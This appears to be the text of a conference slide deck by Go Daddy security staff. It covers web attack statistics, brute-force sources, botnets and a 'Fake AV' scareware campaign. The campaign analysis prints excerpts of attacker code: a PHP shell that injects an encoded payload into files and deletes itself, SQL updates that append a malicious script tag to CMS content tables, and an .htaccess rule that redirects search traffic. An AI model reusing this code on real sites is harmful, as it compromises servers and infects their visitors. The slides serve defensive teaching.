Post on 01-Apr-2015
KEEPING UP WITH THE WEB APPLICATION SECURITY
Ganesh Devarajan & Todd Redfoot
Introduction
Todd Redfoot Chief Information Security Officer
Ganesh Devarajan Sr. Security Architect
The Background
(What does Go Daddy do?)
What does Go Daddy do?
9.4 Million Customers 48 Million Domains Under Management Over 5 million Active Hosting Accounts 1/3 of all DNS queries run through our
servers We register, renew or transfer more
than one domain name every second
What does Go Daddy do?
40+ Security Professionals in Team 24 x 7 Operations Center Research Engineering Forensics Customer Security Advisors Penetration Testing User Administration Development
The Numbers
(What does Go Daddy see?)
What do we see?
Monitor over 100,000 events per second 8.6 Billion/Day
DDoS - ~900 Attacks per day / 6K per week Feb 2011 - Largest attack @ 21M pps Last Week – 40G Attack
Brute Force – 3.5M per hour
What do we see?
“Other” Attacks : 425K – Invalid Directory Traversal 90K – XSS Prevention 115K – SQL Injection Prevention
… all in a 24 hour period…
Current Trends
SSH Brute Forcers
US54%
CN20%
KR6%
BG4%
AR4%
TW3%
FR2%
JP2%
CA2%
BR2%
SSH Brute Forcers
Englewood, Colorado140 Million attempts
MS-SQL Brute Forcers
US65%
CN24%
TR5%
CA2%
-1%
KR1%
TH1%
RU0%
VN0%
IE0%
MS-SQL Brute Forcers
Orlando, FL348 Million attempts
My-SQL Brute Forcers
US78%
CN12%
CA4%
SE2%
FR2%
MY1%
PH1%
IN0%
JP0%
KR0%
My-SQL Brute Forcers
FTP Brute Forcers
CN66%
US26%
HK2%
CA2%IE
2%TW1%
KR1%
RS0%
DE0%
BR0%
FTP Brute Forcers
XingPing, CN12 Million attempts
Brute Forcers - All
US61%
CN27%
TR4%KR
2%CA2%-
1%BG1%
TH1%
AR1%
TW1%
Brute Forcers - US
Garden City, NY75.7 Million attempts
Brute Forcers - CN
Datong, CN22.5 Million attempts
Brute Forcinator
SQL Injection
US41%
CN28%
BG9%
UK5%
ID4%NL
4%CZ3%
JP3%
AU2%
FR2%
SQL Injection
Seattle, WA1.3 Million attempts
Backdoor Shells
US87%
ID4%
NG2%
UK2%
CN1%
CA1%
DE1%
BR1%
NL1%
AL0%
Backdoor Shells
Phone Company (91%)Mountain View, CA
PHP Attacks
US65%
KR8%
FR6%
RU4%DE
3%LU3%UK
3%BR3%
CA2%
NL2%
PHP Attacks
Berlin, Germany1.9 Million attempts
PHP Attacks
Montreal, CA1.1 Million attempts
Botnet
US52%
UK7%
KR6%
PL6%
FR6%
DE6%
CA6%
RU5%
NL4%
AU3%
Botnet
Botnet
Source - https://zeustracker.abuse.ch/
Botnet
Source - http://www.shadowserver.org/wiki/pmwiki.php/Stats/DroneMaps
Phishing
The Good, Bad and Ugly?
The Bad – Most Events
The Ugly – Security Events & DDoS
New Trends
Recent Changes
“Hacktivists” Lulzsec = Twitter ComodoHacker = Pastebin
Phishing -> Spear Phishing
Targeted & Coordinated Attacks
RSA / Lockheed Martin Connection
What’s in the News?
More Client-side Exploits Browser exploits Adobe exploits
Web Server Compromises Brute Force Attacks Leveraging Web Application Vulnerabilities Config files with passwords
More of the same…
Scareware Reports fake viruses to users Asks for fee to remove the threat
Paying does nothing but give them your CC# $10 Million in Revenue last year
Fake AV
Fake AV Analysis
$$$$$$
<html>Holy Crap! Infected! Click Here to clean</html>
GET http://intermediary.com/ll.php
Make HTTP calls to infection script and site is infected
Compromised Attack Server(s)
Servers with Compromised Accounts(Zeus/Phishing/etc)
FTP/SSH Upload of Attack Shell/Script
Casual Web User Visits Infected Site
End Users
Fake AV Basterds
<script>http://intermediary.com/ll.php</script>
Disposable Domain Name
Registrant:Hilary Kneber hilarykneber@yahoo.com7569468 fax: 756946829/2 Sun street. Montey 29Virginia NA 3947
Fake AV – Attack Breakdown
$z=$_SERVER["DOCUMENT_ROOT"];
$encoded='<'.'?php /**/ [base64 encoded string]"));?'.'>';
@unlink($_SERVER['SCRIPT_FILENAME']);
$val=$z;
$totalinjected=0;
echo "Working with $val\n!!STARTING!!";
ob_flush();
$start_time=microtime(true);
if ($val!="")do_folder($val);
$end_time=microtime(true)-$start_time;
echo "|Injected| $totalinjected files in $end_time seconds\n";
Fake AV – Sample Shell
…
$insert='<script src="http://welcometotheglobalisorg.com/js.php?kk=26"></script>';
...
$link=mysql_connect($host,$user,$pass);
if (!$link) {
die('Could not connect: ' . mysql_error());
}else{
echo 'Connected successfully'."\n";
$db_list = mysql_list_dbs($link);
$bases = array();
while ($row = mysql_fetch_object($db_list)) {
$bases[]=$row->Database;
}
…
//wordpress
if (last_is($table,"_posts")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')"; }
//joomla
if (last_is($table,"_content")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')“; }
//drupal
if (last_is($table,"node_revisions")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2“; }
if (last_is($table,"_post")){ $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')“; }
Fake AV – DB Variant
Fake AV - Search Redirect<IfModule mod_rewrite.c>RewriteEngine OnRewriteOptions inheritRewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=945 [R,L]</IfModule>
addhandler x-httpd-php-cgi .php4addhandler x-httpd-php5-cgi .php5addhandler x-httpd-php5-cgi .php
Custom Monitoring
UDP Flooder
How to Protect?
Website Vulnerability Scanners Website Protection -Site Scanner
($48/Year) Beyond Security($99.95/Year) McAfee SecureTM (~$2100/Year) WhiteHat Security® IBM AppScan® Cenzic® HP WebInspect®
Web Based Malware Detection Virtual machine Honey pots
Monitor Creation of new Processes, File system or Registry entries, etc.
Browser Emulation Reputation Service
Internet’s black list Signature Based Detection/Prevention
Intrusion Detection System/Intrusion Prevention System
Anti-Virus
New Methodologies
Questions?
Thank You
Ganesh Devarajan gdevarajan@godaddy.com
Todd Redfoot todd@godaddy.com